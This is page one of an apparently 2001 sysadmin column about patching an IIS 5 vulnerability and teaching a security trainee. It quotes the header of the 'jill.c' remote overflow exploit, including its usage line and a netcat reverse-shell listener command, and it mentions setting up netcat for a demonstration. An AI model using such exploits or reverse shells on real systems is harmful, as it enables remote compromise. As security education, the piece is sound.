Proper Paranoia: Educating Your Co-Workersby Michael W. Lucas
May 1, 2001, 3:15 p.m. The announcement of an IIS 5 system-level compromise hits BugTraq. We have a slew of vulnerable systems, but only one system that can be accessed beyond the firewall. Unfortunately, it's one everybody uses continuously.
Normally I would boot everyone off the system, and patch and reboot while letting user complaints slide off. Unfortunately, it's about time that our new Microsoft security trainee gets a chance to show his stuff. He's a rather experienced administrator, but new to the security aspect of this business.
There are days I really hate having a security trainee. You can prep them, train them, and coach them all you want. But someday, you have to step back and see if they hang themselves or, worse, hang your network.
I tail the firewall log to watch traffic to and from the server, pipe it through
grep to get rid of anything inbound on port 80, and watch for outgoing connections to evil.hackers.org. Fortunately, nothing should be going out from this machine other than Web pages. I decide to give the new guy 30 minutes to notice the Microsoft announcement before I give up and announce that I'm either going to patch it myself or shut down external access to this host.
3:25 p.m. I've revised the
grep statement a dozen times, and am still going cross-eyed. It doesn't help that I have no real idea what sort of traffic I'm looking for, merely "anything weird." Fortunately the trainee walks up to me and says, "Uh, this looks bad ..."
I don't care how bad it looks, I get to stop watching packet streams for an attacker.
So we kick everyone off the server, basically shutting down the office while we apply the patch, verify that everything still works, and let everyone back on. Total work time lost; 30 minutes. Times 100 people, yes; but 30 minutes isn't that bad for an IT emergency. Users grumble about doing maintenance in the middle of the day, then subside.
I developed my security attitude the first time a system I was responsible for was hacked and my account was used to post a Usenet message taking credit for the hack. (I'd have to say that this particular hacker was entirely justified, but that's another story.) That sick feeling in the pit of my stomach remained for days. Because I have a large stomach, it was a pretty large sick feeling. That hack was the most effective attitude training possible. Books and FAQs about preventing and detecting intrusions are nice, but there's nothing like a good, hard boot to the gut to make it really sink in.
Unfortunately, management frowns on me kicking the junior guys.
May 4, 7 a.m. I toddle down to my desk, plug in, and download my mail. This morning's Special BugTraq Surprise is an exploit for the hole we just patched. I'm not going to reprint the whole thing here, just the head of the file.
/* IIS 5 remote .printer overflow. "jill.c" (don't ask).
* by: dark spyrit <firstname.lastname@example.org>
* respect to eeye for finding this one - nice work.
* shouts to halvar, neofight and the beavuh bitchez.
* this exploit overwrites an exception frame to control
* eip and get to our code.. the code then locates the
* pointer to our larger buffer and execs.
* usage: jill <victim host> <victim port> <attacker host> <attacker port>
* the shellcode spawns a reverse cmd shell.. so you need
* ro set up a netcat listener on the host you control.
* Ex: nc -l -p <attacker port> -vv
We learn when something is reinforced. So far, the trainee has learned that implementing security patches brings pain from griping users.
Knowing an exploit exists is one thing; seeing it in action is another. It's time for some reinforcement in the other direction.
The only thing I'm missing is
netcat. That's simple enough to install on FreeBSD:
cd /usr/ports/security/netcat && make install. It's finished well before the trainee comes in.
Pages: 1, 2